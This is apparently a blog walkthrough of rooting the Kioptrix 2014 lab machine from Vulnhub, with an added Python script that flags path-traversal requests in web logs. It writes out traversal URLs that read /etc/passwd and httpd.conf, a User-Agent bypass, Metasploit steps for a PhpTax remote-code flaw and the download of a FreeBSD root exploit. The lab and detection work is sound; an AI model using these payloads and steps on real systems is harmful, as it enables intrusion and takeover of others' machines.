Kioptrix: 2014 (#5) Vulnhub Walkthrough

In this blog post we will see how to root the Kioptrix 2014 machine from Vulnhub.

First, let’s find the IP and open ports on the machine using nmap:

nmap 192.168.18.0-255

Here we have the IP: 192.168.18.76

Port 80 is open, so there will be some web server running. Let’s have a look.

Yes, there is a page. Anything behind that? Let’s have a look at the source code.

Here we have ‘pChart2.1.3’. Now we need to know what pChart is. Let’s do a quick Google search.

The website http://www.pchart.net/ says it is a PHP-based charting library. Now let’s look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3:

https://www.exploit-db.com/exploits/31173

Let’s try that by visiting the following page.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

The /etc/passwd file is displayed in the browser.

Now let’s try to read the httpd.conf file.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

It works!
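From the defender's side, both requests above leave a recognisable trace in the web server's access log. The following is an added example (not from the original post or from pChart) that resolves each Script value against the examples directory and reports requests that escape it; the log lines, client addresses, function names and the assumption that legitimate values stay inside that directory are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate Script values name files inside the examples directory.
BASE = "/pChart2.1.3/examples"
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed access-log lines (combined format); client addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.chart.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:02:13 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:02:40 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [01/Jan/2024:10:03:05 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 152 "-" "Mozilla/5.0"',
]

def fully_decode(value, rounds=5):
    """Percent-decode repeatedly so double-encoded '..' (%252e%252e) is seen too."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def escaped_path(url, base=BASE):
    """Return the resolved path if a Script value leaves `base`, else None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/examples/index.php"):
        return None
    for raw in parse_qs(parts.query).get("Script", []):  # parse_qs decodes once
        value = fully_decode(raw).replace("\\", "/")
        # join() drops `base` when the value is absolute, so that case is caught too
        resolved = posixpath.normpath(posixpath.join(base, value))
        if not resolved.startswith(base + "/"):
            return resolved
    return None

def scan(lines):
    """Return (client, status, resolved_path) for every request that escapes BASE."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        path = escaped_path(m.group(2)) if m else None
        if path is not None:
            hits.append((m.group(1), int(m.group(3)), path))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a reported line is the one to triage first, since it indicates the server returned content for a path outside the examples directory.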

When we scroll down to the end of the file, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

The virtual host on port 8080 only allows requests whose User-Agent starts with Mozilla/4.0, so if our user agent is Mozilla/4.0, we can connect to port 8080.

Let’s try that.

curl -H "User-Agent:Mozilla/4.0" http://192.168.18.78:8080

And the result is:

We have a hyperlink here to /phptax/. Let’s try this in a browser.

I’m using a Firefox extension to switch user agents. Get that here:

https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/

I’ve installed the extension and activated the custom user agent for our machine.

Now let’s load the page in the browser.

Going inside...

This looks like an app for filling in tax forms. OK, so let’s see whether there are any known vulnerabilities in it.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

https://www.exploit-db.com/exploits/21665

Let’s try to exploit that with Metasploit.

msfconsole
search phptax

Now let’s set the options.

Now enter run to run the exploit.

We have a shell now.

Now use the whoami command to find out the current user.

Now use the command /bin/sh -i to get a fully interactive shell.

Let’s now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Let’s look online for available exploits.

https://www.exploit-db.com/exploits/28718

We have a privilege escalation exploit at Exploit-DB. Let’s try that.

Download the exploit to our Kali machine.

wget https://www.exploit-db.com/download/28718 -O exploit.c

Time to send the file to the target machine. The target does not have wget or curl, so we will use netcat to transfer the file.

Let’s start a listener on our Kali machine and send the file to the target machine’s /tmp directory.

On the target machine:

Now we have the exploit file on our target.

Now let’s compile it using gcc.

Time to exploit!

We are root now!